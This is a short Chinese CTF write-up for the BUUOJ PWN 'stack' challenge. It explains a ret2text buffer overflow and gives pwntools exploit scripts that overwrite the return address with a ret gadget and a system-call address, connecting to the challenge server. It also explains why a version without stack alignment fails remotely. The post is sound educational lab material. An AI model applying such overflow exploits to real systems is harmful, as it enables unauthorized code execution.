buuoj [第六章 CTF之PWN章]stack

ret2text

在这里插入图片描述习惯性查一下保护,啥也不是。

在这里插入图片描述很明显的栈溢出。
在这里插入图片描述很明显的shellcode

直接十八个字节再加上返回地址就有了。

exp

from pwn import*

r = remote('node3.buuoj.cn',27516)
#r = process('./stack')

context.log_level = "debug"

#gdb.attach(r)
system_addr = 0x400537
payload = 'a' * 18 + p64(0x40054e) + p64(system_addr)
r.sendline(payload)

r.interactive()

下面这个脚本是个错误示范。

from pwn import*

#r = remote('node3.buuoj.cn',27516)
r = process('./stack')

context.log_level = "debug"

#gdb.attach(r)
system_addr = 0x400537
payload = 'a' * 18 + p64(system_addr)
r.sendline(payload)

r.interactive()

它在本地能跑过,但是远程打不通,因为远程服务器要求有栈对齐,所以需要加一个ret句子滑一下。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值